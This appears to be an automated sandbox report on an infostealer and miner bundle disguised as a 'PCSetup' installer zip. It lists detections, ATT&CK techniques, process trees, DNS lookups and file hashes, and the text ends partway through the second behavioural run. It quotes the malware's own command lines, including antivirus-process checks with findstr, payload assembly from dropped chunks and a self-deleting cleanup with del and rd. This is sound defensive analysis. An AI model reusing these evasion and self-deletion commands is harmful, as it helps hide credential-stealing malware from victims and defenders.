Malware Analysis Report

2024-09-11 15:31

Sample ID 240615-l25faazenk
Target @^NewFile_PCSetup_99553_ṔḁṨṨẄṏṛḒ_^$.zip
SHA256 9bcb71d1d6693753c79d1635b5caaa7cf4d189828397434a4799c2de9b454d34
Tags
stealc vidar discovery spyware stealer amadey xmrig ffb1b9 miner trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9bcb71d1d6693753c79d1635b5caaa7cf4d189828397434a4799c2de9b454d34

Threat Level: Known bad

The file @^NewFile_PCSetup_99553_ṔḁṨṨẄṏṛḒ_^$.zip was found to be: Known bad.

Malicious Activity Summary

stealc vidar discovery spyware stealer amadey xmrig ffb1b9 miner trojan upx

xmrig

Stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Vidar

Amadey

Detect Vidar Stealer

XMRig Miner payload

Downloads MZ/PE file

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Reads data files stored by FTP clients

UPX packed file

Reads user/profile data of local email clients

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Enumerates processes with tasklist

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Process Discovery
T1057
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-15 10:03

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 10:02

Reported

2024-06-15 10:05

Platform

win7-20240508-en

Max time kernel

104s

Max time network

97s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2236 created 1232 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\Explorer.EXE

Vidar

stealer vidar

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Reads data files stored by FTP clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2236 set thread context of 1992 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1720 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1720 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1720 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1720 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2404 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2404 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2404 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2404 wrote to memory of 2424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2404 wrote to memory of 2424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2404 wrote to memory of 2424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2404 wrote to memory of 2424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2404 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2404 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2404 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2404 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2404 wrote to memory of 1980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2404 wrote to memory of 1980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2404 wrote to memory of 1980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2404 wrote to memory of 1980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2404 wrote to memory of 1264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 1264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 1264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 1264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2404 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2404 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2404 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2404 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 2236 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2404 wrote to memory of 2236 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2404 wrote to memory of 2236 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2404 wrote to memory of 2236 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2404 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2404 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2404 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2404 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2236 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2236 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2236 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2236 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2236 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2236 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 1992 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\SysWOW64\cmd.exe
PID 1992 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\SysWOW64\cmd.exe
PID 1992 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\SysWOW64\cmd.exe
PID 1992 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2572 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2572 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2572 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Revenues Revenues.cmd & Revenues.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 366279

C:\Windows\SysWOW64\findstr.exe

findstr /V "RingtoneRentMicrosoftFocuses" Editors

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Isle 366279\m

C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif

366279\Suspect.pif 366279\m

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif

C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif" & rd /s /q "C:\ProgramData\CBFIIEHJDBKJ" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

Network

Country Destination Domain Proto
US 8.8.8.8:53 eijWYJUUWJTVUfljdtx.eijWYJUUWJTVUfljdtx udp
US 8.8.8.8:53 theemir.xyz udp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 steamcommunity.com udp

Files

C:\Users\Admin\AppData\Local\Temp\Revenues

MD5 774a97f2c63a28f5b795e0c7f3a1e797
SHA1 2ab25671bd5a2b253d54594301b765f171aa0cd5
SHA256 a08c17ffca06c08afa2bf6ee98a09c08a2cc22a78596497635cb372d644f140d
SHA512 e6c576edbfc972a9272d4fd969dc4e4f82f5ec61be2c526a1e2686cd4ee0734a649c78673f10efd3e3d9ae7b329a440adcd830fcb6bf3f53d30f678e001518d6

C:\Users\Admin\AppData\Local\Temp\Editors

MD5 c06b582d8286115b48f81ec53f36b383
SHA1 4f925d9b551cebda3f898ad18c62925979bcda7e
SHA256 70290025a0c87bcbd58ea8caf22e2dc0104e726ef3a7f9d9649758869def4189
SHA512 c98e48feca40abf3fc22803dcc80c3f7dc11bc8f3ff6fd03a3d733c1acf438294347169887bcbce82ff20fa9a6cbf0a0d94c76dc15bb5989093d1c2f7903864a

C:\Users\Admin\AppData\Local\Temp\Comparisons

MD5 4e292eb85ce9e016ff5a01c719c027c2
SHA1 61b3995398ed8390e8b8dc1a262eb94d55d6b80f
SHA256 6492ab6cd6f8f028f0824e026ed7c5401136f203f7de953bc60f61b32de4b41f
SHA512 9a19f0345059e401fa82e1d90a103438a04b579ccab2667d609f3d7c0764fd91553e6dda65e771fbf3fb059b0e460ad885c22cf39562bacd7e44b4e7bea43ad7

C:\Users\Admin\AppData\Local\Temp\Terminology

MD5 bc54db6ebb67ee3a2e3c127758bc2884
SHA1 4068d9984c207545e62ad464e2134cac265bf9f7
SHA256 8c1e83e582baf2b8232a7ab8e81a751b45d260f4ff01bab2e42783d0e24d6b43
SHA512 a03330c03209d8ef28707854fda4ce7b2b680a374d820d8e699ef980cc6b1e5548eec7c8c86608e3507b3490f38d61f067b25d99d725f10158b9837666aef3cc

C:\Users\Admin\AppData\Local\Temp\July

MD5 d71ce9af90d20d69dc3de9bc70f9cacd
SHA1 3b5737986225b7358b909f43a201d4872cd3a294
SHA256 fbbc13426ec699ffd56f6c53bc5e5259e25af602205c3d04beac1d4c578f85da
SHA512 85dfe8e9705b97c6a877b0785394171768dc33effa3a37b9969d35ead669172e6e4eb1357d8c231db778a0b37b2d8253b9e6d170e45959ba24a6b2fac868399e

C:\Users\Admin\AppData\Local\Temp\Arg

MD5 d4c42c532dceb34e65d7defc682e77dc
SHA1 7584981bc314640ba1b92da552ffeaedc4ea3a21
SHA256 3e7706b03275975037e49a1a7f29e67bce822086f90630948d9528d9c4b68182
SHA512 67ca5bf547b9bda235c44166681cac7e12515fa49b78ee8d7f564fc094c1509e8fe2f2f029a99ec96ab1fbfb1b9c2d501e4e1d65b4855b75639f2974ac804a4b

C:\Users\Admin\AppData\Local\Temp\Bt

MD5 cf6a6e9c0b825f2b1ced20b4ab200db6
SHA1 8d1987c13c8dc1287f0eb631201ca6eee12b4cd0
SHA256 6e4b33cc9c80b969af96b31b1e95588f9cf79e3670951c63172d60d4e1324f95
SHA512 337bca6e3e8e323821d3767feacc10faefb52b4664968e99c1ab62a72f6770f41bc338bfb672e6602249266b141c4e99d004e48adcd87ea308bdec493674dfdc

C:\Users\Admin\AppData\Local\Temp\Wb

MD5 901d26287ebe3e866d15b610764c49c1
SHA1 13793e6f446a09511642a4f3085cb029a4b853ff
SHA256 c74030e343c6fde4a1f1cf54010c186f9e80b457662bab5500848597c2e19504
SHA512 19ae02941a1a17cbe12c653b3067e10e91e5fe8dd73e0ff2373355eb9ee41af3767ae06885a3fb35bb06e411ec8ac0f291d24e717c01adfcb802539b3cf1f15a

C:\Users\Admin\AppData\Local\Temp\Choose

MD5 fb2cc8e690d82366990f2f20a4a5ab75
SHA1 5556232996e954f981144129298e298c75f8c2fe
SHA256 51982155baed7d5006ebc4446a417f320f8d754ec99911fcfa97ee5d37ce7756
SHA512 e8ae811d270bd2de39d0578e84b0001bffaf34969a1fabaedbe804d96eb79919c13578f41af339ce9af26f5cb6cb107bd6d79c1af9aee8a9e359b4b885fde823

C:\Users\Admin\AppData\Local\Temp\Ns

MD5 67546d73dfe4d66538a7ac7dc030238f
SHA1 1a3450f06ac594739db273e3eb0155018fccc88e
SHA256 71f45ed46fbd47494a7ecb9b31c07214d99133e35b974f5cf2beceabb639217d
SHA512 f3ceb864801ddb2d7f8298950dd76a0738ab4586796d16290c1c8c11579b9017a9b14c94341c24ac024f89a38e402c81903fcabaa2dddd21ca681af173bf5bb3

C:\Users\Admin\AppData\Local\Temp\Objects

MD5 f2f3a8cb98474080fdcca6a39b6b3915
SHA1 49f7327ca65d969203be51ccbf9f4033579923d0
SHA256 ca682c8dcdca30548120b6d3194eebf36a9208bef0e9b611da828bd912a38260
SHA512 cde92ed6e3ad806f0acd220990b46168862511222ae3667c62084f93622cc7ba2e91ed3b1e489f5721b8eeba9fc25b5a718febe3718c1afb74fcc6b4f8c0b1b9

C:\Users\Admin\AppData\Local\Temp\Gc

MD5 f446974fde635cadfcc03c9a25fd3780
SHA1 b59e1202f13139f21db4274d65ac51d2a0f8b856
SHA256 5bc7072917151653d7c40e272d8a95a86bbe7ad027eb30a811331a6f7df7ba51
SHA512 cc1a13562df99e2e2a240ad8d8e8d948846c6c5be0c995d87785e3cf73b54824ee7318c423972ea362dafbaac986f19d0117bc7e5192af5a2ff9fc8430bcc1e7

C:\Users\Admin\AppData\Local\Temp\Marcus

MD5 16fcba5d9aed0ef000c886f56cba85ee
SHA1 22584f6b7227ea3e0898233325be3ecb3c7bef6a
SHA256 35d270b74aa68781c8e0bc3cd008718ce362fe9fd32c9ba1ad52b82fe37d07aa
SHA512 7beb4a5207087b0e37f16df84702e4cac8699f951f6a92c7185bc83582766a43ef18bc93af24827793951f2417dd39bdf0717876f75f32feacec93fdfb2896f7

C:\Users\Admin\AppData\Local\Temp\Thus

MD5 08c077a34051a75c2b915a517c5d7d54
SHA1 ecb5cef32ca27ea5542b7416bc550601721f4a32
SHA256 3ed1a12fde96bc80c62d54a0647000dff23a63b987fe8c3faa9e11b4357321a0
SHA512 8746dae03892cee35b1a4463a7765399f2d1d1d989c53d0881043991c4187f7b4b1765376c435ff13722ec6dff2da98287efca0b335508f24d6f1805034e0f70

C:\Users\Admin\AppData\Local\Temp\Broadway

MD5 abfa29a29931ff6299126aed8dd08859
SHA1 c436e000edcc042f7f7889950a610c94d590d36c
SHA256 dd57cfa1ec84ac01cd4aab6dd18046b3a49daf0445ae29d6695c4a25c0bcd59d
SHA512 c0941a5de5fe072ba81b41b555ffdb59c6e0d2b9bed66a0cbb899699c38792cda0bb9857ab0752dbe0b3c966688ccb523989677803bf637675ec435a8c12406e

C:\Users\Admin\AppData\Local\Temp\Shares

MD5 8715208e25afa7a73918e84ee8b27f50
SHA1 61935bc176db5586053d1d5a22dae8092e6a3f7e
SHA256 f0eba5c2f4c9998b0a491a7ec4fc953e601235709b3536ba1a928e8d5021d3f1
SHA512 461d9e809ede59c71cd7fd9aa90a8ad991c5c9504d5c9c53659604e7e0e25b02d2135fbc0b2c4ab0e4a60bd43c38fa1109559d5f19f58a387dbe8e03424230c8

C:\Users\Admin\AppData\Local\Temp\Talk

MD5 bb769ef1b8aa0b58d0b94c4804bcd418
SHA1 e6f4dc5a736038e5604e282046d1234ccabebf68
SHA256 ae766919ddefe1340cea9b4ae3acfc041e8d079baa7fcf7dca59dfa3330c2d59
SHA512 2d0e600f59a545b1d19f299a8b756bab334b02be8e9f6e1ff2d3f64c18362bcb60239b0786358023728be88c8e033219e9df500d30b3121921d356055c60bb05

C:\Users\Admin\AppData\Local\Temp\Pda

MD5 0766c0db71d9a82456e72ca071518676
SHA1 be36286b20cc0aeff00bdca079dfa9f4047e1ac0
SHA256 5553cf5ed1753ab9749bb7f3057f0db8cb9f19b8f673fa977b038ca0fef8b3d1
SHA512 032dad0b91b5482d5d1e558ba9e4dfea6f16c71725d21865f411f888fe631628f7a16a3e9fc367d88c02fde7f6ef7fd56a717c23feb45eb1ff5968605fb7fb77

C:\Users\Admin\AppData\Local\Temp\Roy

MD5 6310218145bc5ec965e5953fb0305d19
SHA1 b6043e6b47ea99b13efea5b2b7c523248379f6af
SHA256 ae7d0d86b3505a9c5c40bce3fd2554102e4f7d21aa5bdcc10451ce1019606629
SHA512 ae82e5721644c9f51852c5973dec9e250b83593b4079c7d3360e55700c75e43f9cac36de508654831c37e4d4ffdfcc8aabe8d681bcfd7a3a72d8d3f3df0fe6ec

C:\Users\Admin\AppData\Local\Temp\Atlanta

MD5 05bf6c32a8d3cb1025a4e8baca686fc5
SHA1 e32584b21803cf8bed34367c8e4f34ff6104d6c4
SHA256 61460bebb1a3ada4d197a869a8d9637eaf03656b32509e5a4606240d06ab3361
SHA512 c93b4c23daf481e9ebcb8d19d1381e3a7ab49b1708e0340a9455a11fc26b3209577cc831e7610d212a0e677b8f6217855038b1cf0b2379f397549b92cbf89b03

C:\Users\Admin\AppData\Local\Temp\Gis

MD5 e5e509038d8029cc95879ae96199093c
SHA1 18fceacd1cf5c57c6c2f1dc59a05906b740323a0
SHA256 bfa2b066ea73af4b0296b130a7c1927a4723864502ec646809aca415677844a6
SHA512 359d9dc6751abf5dbbede201409e77652f595f40148f987272aacb50e320c43562f93db179727d05120c7bb8edb45c3fb81c30aebc91422f33ca7c70466b34b1

C:\Users\Admin\AppData\Local\Temp\Russian

MD5 91be5c23d6db4ea3e47b0259475cdd4b
SHA1 07cee20085effe581fddb260a65473c130e88e21
SHA256 8e6d9c7c4069ed6ea1fa346238ce48cf4479df04d1871e874f8c31e8ffede898
SHA512 e4f536a4f9b60098abd7212f82cacf6d9729a89c207a74a7dfcf8b9069a64eb024d60f0d506c1a50726d60c267222d200a50a6cc3a31a06ea1ef9ab3fce887e3

C:\Users\Admin\AppData\Local\Temp\Wallpaper

MD5 98d91341d4e754f361bbedeb35242a36
SHA1 4718235cf9242f7250700af2a3411357d2a2525c
SHA256 42d670d3dd28bc4597b71a9373763029451d0da5efe1288c774f6b512fae9f0e
SHA512 1e877510d91e6f62790b7f15c7ffa00c31e18f24bc3ec72dcd63e9c2b0031817bbf87e1f9d3359f50dd25f1d6e53eeea61fc9331ebc58f88361fcd2353e32fa9

C:\Users\Admin\AppData\Local\Temp\Serving

MD5 d0fa08b94bca138551c4b274ade27a75
SHA1 acaa349e9d6f03d622c2f0280247a43fbc078f3a
SHA256 4e9de0fd78447786652a61ab8339253c2ec4c671d3a9dd956d3aca384a7ee4a1
SHA512 bc17fd7b4b79f96d7adbf35c96919c49ace59ac0e2807fb31e7e88871218b5f0ad6f9183087c451675c16f24a16ed278fa78b325a3b631068e2fee16b3a84622

C:\Users\Admin\AppData\Local\Temp\Pct

MD5 5021070dbffa36d9053699bee3f88806
SHA1 00ce3f117ffe45372c27af5f920ebacdeac92f93
SHA256 41757cf277d0f40e48e2bfc6d963db78308fdfe0b054f67685e2a6473e25327b
SHA512 628268ba6d7c30f1d03f84ff3955782ed23f426645fb8a914b83514f1de9ef23b5060f57e8c6f38dc8071adf063971f050989cab5eb2ef300072ccb58bd7183a

C:\Users\Admin\AppData\Local\Temp\Tomorrow

MD5 b348e7db88d0e52cfb6c7adb43628390
SHA1 5daa60ea78be614a992e88a60b655601cb45ebb6
SHA256 fa61763479671d7aa59798ccd20a2ae48102e24f2fdbc11e753c2141b3e0d135
SHA512 9d3018d203bad94e6a6efb2f5c5dfb55b14d5a6e1885cc60a34f0c647771cede2626e448f2fc194e3d17795c97ebb0bf283cb2a24a7db71f5e7fd15bdab01eff

C:\Users\Admin\AppData\Local\Temp\Word

MD5 ca2ac61ab298e06c4d8f07792708705c
SHA1 35547141d3593d89746a4de38e809388de7b224f
SHA256 cabef77014cb90d5e896c046830742852edb20adcd1da71f88f8f8805d476607
SHA512 c6f0fccfaa08ef6f4d17698eb07cf27fa116b94bab2a25afe392acb2fecb1fb9d58301288e80839dadf834245a614846d72d1243693b40a56d7be45745f90218

C:\Users\Admin\AppData\Local\Temp\Shaft

MD5 4a29dcfa87b47e37e8b4447b840ccd91
SHA1 cd56012f27e7ece5545b6b07172f8f0169a852f5
SHA256 dbf049319595a1a9faf8c8dbc70814c4562c4b9dd10f18e56b0cb83e37cdce5c
SHA512 79b69684e7a72eb7fa24f36745f42370acc6655e44fbbd93dda679ed676c010a38a530b3b210196b6962e36ca1756fedb4341f867bdeb2e86c6ded23b7dde91f

C:\Users\Admin\AppData\Local\Temp\Colleagues

MD5 8a6af62b964e899f2fdb5b08bb70fe1d
SHA1 74d97553398f4952fc7244db53a54c5c9418680b
SHA256 621b098f227833dd3d62d4b181bf751e76d9688237ae27ba4475947863775103
SHA512 be082ccae47ebb4bb28f9d9fc9ffb089e081ab95d41232be5bd998fdfcb6995816141e46289f7fb15acf890bc97ce77fb413c8a56424a411dcce03354d093186

C:\Users\Admin\AppData\Local\Temp\Isle

MD5 c7edd1b120ffd89a03bb13f43248c03f
SHA1 70cdf64d0b1f9ddeed567599ed2b4ea6c0fad204
SHA256 84e53bfccccd03c162214a5b47741945c029afd23ec7ca307f1a66bc292ff3f8
SHA512 9d760c5455f7daa4ee1aeb3070d33cc43ec933f843333ae9d89f15d62f3840939bb83ad39420bf3fc9f800c8dcdde3f39085e7fcdfbedeeb999382ac1f9e75e2

\Users\Admin\AppData\Local\Temp\366279\Suspect.pif

MD5 b06e67f9767e5023892d9698703ad098
SHA1 acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA256 8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA512 7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

memory/1992-583-0x0000000000920000-0x000000000106A000-memory.dmp

memory/1992-584-0x0000000000920000-0x000000000106A000-memory.dmp

memory/1992-586-0x0000000000920000-0x000000000106A000-memory.dmp

memory/1992-589-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/1992-588-0x0000000000920000-0x000000000106A000-memory.dmp

memory/1992-587-0x0000000000920000-0x000000000106A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-15 10:02

Reported

2024-06-15 10:05

Platform

win10v2004-20240611-en

Max time kernel

120s

Max time network

130s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
